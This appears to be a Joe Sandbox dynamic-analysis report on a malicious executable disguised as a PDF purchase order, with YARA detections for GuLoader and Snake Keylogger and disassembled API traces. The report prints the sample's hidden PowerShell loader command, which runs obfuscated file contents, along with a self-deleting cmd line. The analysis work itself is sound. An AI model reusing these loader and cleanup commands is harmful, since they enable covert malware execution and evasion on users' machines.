Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Fingereringerne=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fernland.Reg';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) "
Imagebase:	0x1d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2547573653.0000000008F0F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:13:04
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:13:46
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\Forbundsstater.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Forbundsstater.exe"
Imagebase:	0x400000
File size:	878'240 bytes
MD5 hash:	3755CE1468A267B6E1084C8069B54A8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:14:04
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:14:04
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:14:04
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0xf50000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	20.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.1%
Total number of Nodes:	1283
Total number of Limit Nodes:	35

Executed Functions

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNELBASE(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\LPO-9180155-PDF.exe",00000000), ref: 004033D9
CharNextW.USER32(00000000,"C:\Users\user\Desktop\LPO-9180155-PDF.exe",00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
DeleteFileW.KERNELBASE(1033), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040364B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\LPO-9180155-PDF.exe",00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) ",?), ref: 004036C4
CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

TMP, xrefs: 00403556
Low, xrefs: 0040353C
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 004035FC
\Temp, xrefs: 00403520
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 004034EE, 004035F1, 00403670, 0040367A
1033, xrefs: 0040356A
"C:\Users\user\Desktop\LPO-9180155-PDF.exe", xrefs: 004033CC, 004033D2, 00403593
';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) ", xrefs: 00403688
C:\Users\user\AppData\Local\Temp\, xrefs: 004034FE, 00403503, 00403519, 00403525, 00403534, 00403541, 0040354D, 00403555, 0040364A, 00403656, 00403662, 00403669, 0040371A
NSIS Error, xrefs: 004033B7
Error launching installer, xrefs: 004035D6
SeShutdownPrivilege, xrefs: 0040376D
C:\Users\user\Desktop, xrefs: 00403650, 00403655, 00403679
TEMP, xrefs: 0040354E
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B
~nsu.tmp, xrefs: 00403645

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\LPO-9180155-PDF.exe"$';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) "$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-340450424
Opcode ID: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: 3a71142bea5852d146cd8a944560142c666d5a8b8df90e4b86a8bdae5e932891
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

{, xrefs: 00405539

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: f3fca72fe88596ceb2a1dc6132db26d4a0074a2eaed671f798e7e9429c30ec02
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00405F0A Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00405FCD
GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 0040604B
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 0040605E
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 004060A8
CoTaskMemFree.OLE32(?), ref: 004060B3
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051C9,Completed,00000000,00000000,00000000), ref: 00406131

Strings

';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) ", xrefs: 00406104
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D1
Completed, xrefs: 00405F2F
: Completed, xrefs: 00405F34, 00406014, 00406035, 0040604A, 0040605D, 00406079, 004060A4, 004060D6, 004060DC, 004060F6, 0040610A, 0040612A, 00406130, 0040613C, 0040616F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406019

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: ';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) "$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-505860459
Opcode ID: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
Opcode Fuzzy Hash: 767b1783d20f48028c3daf2e5817f9a09796155ef10d83a1b14549b8d5aa00da
Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\LPO-9180155-PDF.exe"), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*), ref: 004057E1
lstrcatW.KERNEL32(?,00409014), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\LPO-9180155-PDF.exe"), ref: 0040580A
FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\LPO-9180155-PDF.exe"), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

\*.*, xrefs: 004057DB
C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
"C:\Users\user\Desktop\LPO-9180155-PDF.exe", xrefs: 00405779

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\LPO-9180155-PDF.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2818604858
Opcode ID: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: 75d2b363e8663622168b21bd6825bb858b54638de43af0c3db2919d8f48e60de
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 00406252 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
GetProcAddress.KERNEL32(00000000,?), ref: 00406280

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(1033,004226D0), ref: 00403933
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

RichEd20, xrefs: 00403AE6
